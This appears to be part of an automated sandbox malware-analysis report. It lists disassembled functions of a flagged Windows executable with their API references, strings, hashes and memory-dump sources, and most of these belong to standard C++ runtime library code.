                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0cb5301bfb14595140cc0811a37ec76ac063a7b0abac73273aaf138af097b2d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39D17E2690C741C6EB20BB75D9403ADB7A0FB45B98F900235EA8D57BA5EF39E580C712
                                                                                                                                                                                                  Function 00007FF7450114D0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 177COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Concurrency::cancel_current_taskLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                  • String ID: bad locale name$false$true
                                                                                                                                                                                                  • API String ID: 3230409043-1062449267
                                                                                                                                                                                                  • Opcode ID: afab6556e89614ede04dc03f7581b6da9bd45ca64264cc0dc57f2635faf1f447
                                                                                                                                                                                                  • Instruction ID: 63101755720f17ef38b7f6929ccaec61ced80cbb511b3765509bede289298934
                                                                                                                                                                                                  • Opcode Fuzzy Hash: afab6556e89614ede04dc03f7581b6da9bd45ca64264cc0dc57f2635faf1f447
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6815C36A18B41C5EB15EF70E4802ADB7B0FF84B44F941135EA8D27A6AEF39D090D761
                                                                                                                                                                                                  Function 00007FF74501F060 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 490COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: f$p$p
                                                                                                                                                                                                  • API String ID: 3215553584-1995029353
                                                                                                                                                                                                  • Opcode ID: 33ca78d60bc5f6766661f281c9a33675417ec6c8c3f173fb2b57ff99d840dbb5
                                                                                                                                                                                                  • Instruction ID: 668643eb43d6ff93e183c803f66991f63fff007ad23ca5b98b0feed3fc1c2e55
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33ca78d60bc5f6766661f281c9a33675417ec6c8c3f173fb2b57ff99d840dbb5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C128369E0C143C6FB247A34E154279F691FB80F54FD44135EA9947AE4EB7EE8808B32
                                                                                                                                                                                                  Function 00007FF745023100 Relevance: 10.8, APIs: 7, Instructions: 293COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: d2d48f5f8216a064bed94166f96c750ba145c2b024a4f3d7f97831b3288a8f74
                                                                                                                                                                                                  • Instruction ID: fc399fb0420f409db2821e4392cb54e92486285b3740ad83da3a4237cc7ac676
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2d48f5f8216a064bed94166f96c750ba145c2b024a4f3d7f97831b3288a8f74
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06C1C26AA0C686C1E661BB3594402FEB7A1EB81F80FD90135FA4D077A1DF7CEC458722
                                                                                                                                                                                                  Function 00007FF74500CB30 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Invalid fill (too long).$Invalid format string.$invalid fill character '{'
                                                                                                                                                                                                  • API String ID: 909987262-2189586557
                                                                                                                                                                                                  • Opcode ID: 99897ebe6694852e25c7ea0d4d07e836e670ceaf1c9a5c33b75c505e65619796
                                                                                                                                                                                                  • Instruction ID: 34f73a68176b00982e9376990f80bdd7120b9df5a54e8a091e376d611e677c59
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99897ebe6694852e25c7ea0d4d07e836e670ceaf1c9a5c33b75c505e65619796
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3341C42AB0D586C2EA24BB69E5005BAE391FB50FC4FD88032DB4D177B4DE2CE5418320
                                                                                                                                                                                                  Function 00007FF745018D3C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF745018F43,?,?,00000000,00007FF745015A4A,?,?,?,00007FF745015681), ref: 00007FF745018DC1
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF745018F43,?,?,00000000,00007FF745015A4A,?,?,?,00007FF745015681), ref: 00007FF745018DCF
                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF745018F43,?,?,00000000,00007FF745015A4A,?,?,?,00007FF745015681), ref: 00007FF745018DF9
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF745018F43,?,?,00000000,00007FF745015A4A,?,?,?,00007FF745015681), ref: 00007FF745018E67
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF745018F43,?,?,00000000,00007FF745015A4A,?,?,?,00007FF745015681), ref: 00007FF745018E73
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                                                  • Opcode ID: 9dbde63215cfc7ba96cacac694e9eb4286c7b5e2e0c56a200d663d579f1fb202
                                                                                                                                                                                                  • Instruction ID: c389618d5c5048e6dc5055b901d3ac2e7eae2221820a33323674edfc2f3c175d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9dbde63215cfc7ba96cacac694e9eb4286c7b5e2e0c56a200d663d579f1fb202
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC318F39B1EA42D1EE21BB22A800675A3D4BF44FA4FC90535DD1D4B7A0FE3DE9448365
                                                                                                                                                                                                  Function 00007FF74502B8F8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                                                  • Opcode ID: 70b9b4b18cdd0463ba611dc2b562efa17e2d6f8e409e651d34a518ccd629b44f
                                                                                                                                                                                                  • Instruction ID: e8ca2cb1fa166ad6f05a3091b6058b957a0cbd48497026d76759642155a3d3d3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70b9b4b18cdd0463ba611dc2b562efa17e2d6f8e409e651d34a518ccd629b44f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9118E25A1CA41C6F750BB26E854329E7A0FB88FE4F844234EA5E877A4CF3CD944CB50
                                                                                                                                                                                                  Function 00007FF74500C8B3 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type specifier$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                                                                                  • API String ID: 0-1829489339
                                                                                                                                                                                                  • Opcode ID: 9d1d7f6b48b2148a2be8a280d6ad38378451906d75941cc495af1718f4f759e6
                                                                                                                                                                                                  • Instruction ID: 95ad18c2a1b5111e88462febbfc91d2b3eecb765bd169f3d49db10089379cd6d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d1d7f6b48b2148a2be8a280d6ad38378451906d75941cc495af1718f4f759e6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3501807AE2D496DAEA76B334B4592B4F750AF52F04FE40432D20D015F1CD1DE980C721
                                                                                                                                                                                                  Function 00007FF7450133CC Relevance: 9.2, APIs: 6, Instructions: 206COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiStringWide
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2829165498-0
                                                                                                                                                                                                  • Opcode ID: 4656a780b65f2dba5bdd5ccf7afebc1fe425982cac1aa4f8c33221aefcbdc509
                                                                                                                                                                                                  • Instruction ID: cf15393b4cbd0e1c61f50bb26c9ee79995605f16587b7755e8c4c6d327753a5d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4656a780b65f2dba5bdd5ccf7afebc1fe425982cac1aa4f8c33221aefcbdc509
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A781B27660C741C6EB20AF3594403A9B295FB54FE8F944231EA9D47BE8EF3DE4448721
                                                                                                                                                                                                  Function 00007FF745006620 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2081738530-0
                                                                                                                                                                                                  • Opcode ID: 0dd1054ecf2c838b0c6fa03abb329649a9275ee65366250e4a6a3aaa965ae2b3
                                                                                                                                                                                                  • Instruction ID: dd14ad126fe7024a4279ebf3c7256b3039649eb2cc1a5ecc8d94a6b414d50345
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0dd1054ecf2c838b0c6fa03abb329649a9275ee65366250e4a6a3aaa965ae2b3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90413B2AA0CB42C1EA54FB25F554169B7A2FB85F94F885132EA8E137A9DF3CE441C710
                                                                                                                                                                                                  Function 00007FF7450168E0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 320COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                  • API String ID: 3523768491-393685449
                                                                                                                                                                                                  • Opcode ID: e612acec61e4d8f34becb406906a2f48129ca5cf95974f331aad295306a019f2
                                                                                                                                                                                                  • Instruction ID: eeceddd1d7e12baba8f15bc692995bf63a6ea03f9cbfb66f23103528ee9fc8e5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e612acec61e4d8f34becb406906a2f48129ca5cf95974f331aad295306a019f2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2E1957790C692CAE710BF34D4802BDB7A0FB45B58F944135DA8D4BAA5EF39E481CB12
                                                                                                                                                                                                  Function 00007FF74501FE60 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00007FF74501FE6F
                                                                                                                                                                                                  • SetLastError.KERNEL32 ref: 00007FF74501FE8E
                                                                                                                                                                                                  • FlsSetValue.KERNEL32 ref: 00007FF74501FEB7
                                                                                                                                                                                                  • FlsSetValue.KERNEL32 ref: 00007FF74501FEC8
                                                                                                                                                                                                  • FlsSetValue.KERNEL32 ref: 00007FF74501FED9
                                                                                                                                                                                                    • Part of subcall function 00007FF745021270: HeapFree.KERNEL32(?,?,00007FF74501EB93,00007FF745027F3E,?,?,?,00007FF7450282BB,?,?,00000000,00007FF745028835,?,?,?,00007FF745028767), ref: 00007FF745021286
                                                                                                                                                                                                    • Part of subcall function 00007FF745021270: GetLastError.KERNEL32(?,?,00007FF74501EB93,00007FF745027F3E,?,?,?,00007FF7450282BB,?,?,00000000,00007FF745028835,?,?,?,00007FF745028767), ref: 00007FF745021290
                                                                                                                                                                                                  • SetLastError.KERNEL32 ref: 00007FF74501FEFC
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$Value$FreeHeap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 365477584-0
                                                                                                                                                                                                  • Opcode ID: 7d940b9c3ff0367c9174bf1878464230a1b5f9245b517ea6733fba7638263c74
                                                                                                                                                                                                  • Instruction ID: 0ffb6f9e86785887cdaf133a7a6bef6d014d765ff0118a2dfe30dacb9b918866
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d940b9c3ff0367c9174bf1878464230a1b5f9245b517ea6733fba7638263c74
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C114228F0C243C2FA14BB71A81147ED252AF89F90FD45634F91E866F6EE3CE8424635
                                                                                                                                                                                                  Function 00007FF745001B60 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                  • API String ID: 2967684691-1405518554
                                                                                                                                                                                                  • Opcode ID: 99afec0a0b22084cf753d037e721fc8db694c265a87d530e842191db248f4f7a
                                                                                                                                                                                                  • Instruction ID: 33fe04e3565ec7a5a706978970d65e03c7c2e2ee24a4587d272390dfffa42d8b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99afec0a0b22084cf753d037e721fc8db694c265a87d530e842191db248f4f7a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD417C26B0DB41C9FB15FFB0E4502BDA3A4AF44F48F844134DE4E26AA5EF38D5169361
                                                                                                                                                                                                  Function 00007FF745012160 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: Negative precision.$Number is too big.
                                                                                                                                                                                                  • API String ID: 3237623162-3993994484
                                                                                                                                                                                                  • Opcode ID: 1c8eeda72e458831a1f13c6a46e9a6da0929dd9a543c3f466b0eae3888ca776f
                                                                                                                                                                                                  • Instruction ID: 1b6afd976f78af73e066b9a93a3f94bf7a806b7c96e65e1d44d8378d223544d1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c8eeda72e458831a1f13c6a46e9a6da0929dd9a543c3f466b0eae3888ca776f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B21387B90C28BDFE3067B7880160BDBBB0BF41F18FA48831D799454A3EA1E25919361
                                                                                                                                                                                                  Function 00007FF74501CED0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                  • Opcode ID: 4d8e07e8608513ae84f901cea509d4f24fb36c9c5adadd4e789a9db5de37c91c
                                                                                                                                                                                                  • Instruction ID: 648dbd187d3b6834b0071df87f022c238f5f04a444fbc6cdb69e3723d6cef6bc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d8e07e8608513ae84f901cea509d4f24fb36c9c5adadd4e789a9db5de37c91c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1F06D29A0C602C1EA10BB34E4857799320BF89F64FD80638EA6E462F4DF3DD445C721
                                                                                                                                                                                                  Function 00007FF745003A60 Relevance: 7.9, APIs: 5, Instructions: 367COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
